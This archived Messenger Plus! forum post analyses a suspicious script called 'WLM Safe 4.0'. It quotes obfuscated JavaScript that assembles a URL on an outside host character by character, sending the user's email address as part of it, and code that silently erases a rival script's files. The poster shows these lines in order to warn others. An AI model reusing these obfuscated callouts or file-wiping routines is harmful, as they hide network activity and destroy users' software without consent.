What happened to the Messenger Plus! forums on msghelp.net?
Shoutbox » MsgHelp Archive » Messenger Plus! for Live Messenger » Scripting » WLM Safe 4.0 - What is this!

WLM Safe 4.0 - What is this!
Author: Message:
Spunky
Former Super Mod
*****

Avatar

Posts: 3658
Reputation: 61
35 / Male / Flag
Joined: Aug 2006
RE: WLM Safe 4.0 - What is this!
Javascript code:
if (Success && Url == "h" + "t" + "t" + "p" + ":" + "/" + "/" + "c" + "i" + "l" + "a" + "." + "m" + "i" + "s" + "s" + "-" + "w" + "e" + "b" + "." + "e" + "s" + "/" + Messenger.MyEmail + "." + "d" + "a" + "t") {


Suspicious ^o)

Javascript code:
function kickWLMsafe() {
    if (!fso.FileExists(Directory + "\\Scripts\\" + "WLM Safe" + "\\ScriptInfo.xml")) {} else {
        MsgPlus.DisplayToast(Script_Name, RLFF(LangT, 81) + RLFF(LangT, 82), "", "DelWLMS");
        ErrorNN("821", "WLM Safe");
        TraceIA(RLFF(LangT, 83))
    }
}
function DelWLMS() {
    var fileObj = fso.OpenTextFile(Directory + '\\Scripts' + '\\WLM Safe' + '\\ScriptInfo.xml', 2, 0);
    var fileObjA = fso.OpenTextFile(Directory + '\\Scripts' + '\\WLM Safe' + '\\wlmsafe.js', 2, 0);
    fileObj.Write('');
    fileObj.Close();
    fileObjA.Write('');
    fileObjA.Close();
    MsgPlus.AddTimer("delws", 3000)
}
 


Instant removal. No script should affect any other script in any way ^o)

Javascript code:
    MsgPlus.DownloadFile("h" + "t" + "t" + "p" + ":" + "/" + "/" + "c" + "i" + "l" + "a" + "." + "m" + "i" + "s" + "s" + "-" + "w" + "e" + "b" + "." + "e" + "s" + "/" + Messenger.MyEmail + "." + "d" + "a" + "t", TempFolder + "\\" + Messenger.MyEmail + ".dat")


Again, Suspicious ^o)

Also, it uses my "Clone Warning!" script, which in itself isn't usually a problem for people to use my code. However, in this case it's the whole script with my messagebox replaced with another function :(

EDIT: I think I might make a better version of this myself. One we all know is going to be safe.

This post was edited on 02-11-2009 at 02:59 PM by Spunky.
<Eljay> "Problems encountered: shit blew up" :zippy:
02-11-2009 02:57 PM
Profile PM Find Quote Report
« Next Oldest Return to Top Next Newest »

Messages In This Thread
WLM Safe 4.0 - What is this! - by BlackStar on 02-09-2009 at 09:55 PM
RE: WLM Safe 4.0 - What is this! - by prashker on 02-09-2009 at 10:35 PM
RE: WLM Safe 4.0 - What is this! - by Menthix on 02-09-2009 at 10:51 PM
RE: WLM Safe 4.0 - What is this! - by MeEtc on 02-10-2009 at 01:21 AM
RE: WLM Safe 4.0 - What is this! - by wincy on 02-10-2009 at 02:34 PM
RE: WLM Safe 4.0 - What is this! - by TheGuruSupremacy on 02-10-2009 at 03:01 PM
RE: WLM Safe 4.0 - What is this! - by Jigen90 on 02-10-2009 at 03:13 PM
RE: WLM Safe 4.0 - What is this! - by Jigen90 on 02-10-2009 at 04:35 PM
RE: WLM Safe 4.0 - What is this! - by TheGuruSupremacy on 02-10-2009 at 04:41 PM
RE: WLM Safe 4.0 - What is this! - by BlackStar on 02-10-2009 at 06:07 PM
RE: WLM Safe 4.0 - What is this! - by wincy on 02-10-2009 at 07:20 PM
RE: WLM Safe 4.0 - What is this! - by Menthix on 02-10-2009 at 07:53 PM
RE: WLM Safe 4.0 - What is this! - by wincy on 02-10-2009 at 09:28 PM
RE: WLM Safe 4.0 - What is this! - by NiteMare on 02-11-2009 at 04:13 AM
RE: RE: WLM Safe 4.0 - What is this! - by wincy on 02-11-2009 at 01:22 PM
RE: WLM Safe 4.0 - What is this! - by roflmao456 on 02-11-2009 at 05:43 AM
RE: RE: WLM Safe 4.0 - What is this! - by Jigen90 on 02-11-2009 at 09:29 AM
RE: WLM Safe 4.0 - What is this! - by vaccination on 02-11-2009 at 01:50 PM
RE: WLM Safe 4.0 - What is this! - by Moh on 02-11-2009 at 02:13 PM
RE: WLM Safe 4.0 - What is this! - by wincy on 02-11-2009 at 02:17 PM
RE: WLM Safe 4.0 - What is this! - by Spunky on 02-11-2009 at 02:57 PM
RE: WLM Safe 4.0 - What is this! - by wincy on 02-11-2009 at 03:06 PM
RE: WLM Safe 4.0 - What is this! - by Spunky on 02-11-2009 at 03:15 PM
RE: WLM Safe 4.0 - What is this! - by wincy on 02-11-2009 at 03:29 PM
RE: WLM Safe 4.0 - What is this! - by Spunky on 02-11-2009 at 03:36 PM
RE: WLM Safe 4.0 - What is this! - by wincy on 02-11-2009 at 03:42 PM
RE: WLM Safe 4.0 - What is this! - by Menthix on 02-11-2009 at 08:23 PM
RE: WLM Safe 4.0 - What is this! - by Spunky on 02-11-2009 at 08:31 PM
RE: WLM Safe 4.0 - What is this! - by Menthix on 02-11-2009 at 08:45 PM
RE: WLM Safe 4.0 - What is this! - by wincy on 02-11-2009 at 09:09 PM
Thanks! - by wincy on 05-25-2009 at 05:08 PM
RE: WLM Safe 4.0 - What is this! - by BlackStar on 05-25-2009 at 06:21 PM
RE: WLM Safe 4.0 - What is this! - by wincy on 05-25-2009 at 07:33 PM
RE: WLM Safe 4.0 - What is this! - by CookieRevised on 05-25-2009 at 07:49 PM
RE: WLM Safe 4.0 - What is this! - by Menthix on 05-25-2009 at 08:02 PM
RE: WLM Safe 4.0 - What is this! - by CookieRevised on 05-25-2009 at 08:12 PM
RE: WLM Safe 4.0 - What is this! - by wta121 on 05-26-2009 at 11:37 AM
RE: WLM Safe 4.0 - What is this! - by wincy on 05-26-2009 at 11:57 AM
RE: RE: WLM Safe 4.0 - What is this! - by CookieRevised on 05-26-2009 at 01:30 PM


Threaded Mode | Linear Mode
View a Printable Version
Send this Thread to a Friend
Subscribe | Add to Favorites
Rate This Thread:

Forum Jump:

Forum Rules:
You cannot post new threads
You cannot post replies
You cannot post attachments
You can edit your posts
HTML is Off
myCode is On
Smilies are On
[img] Code is On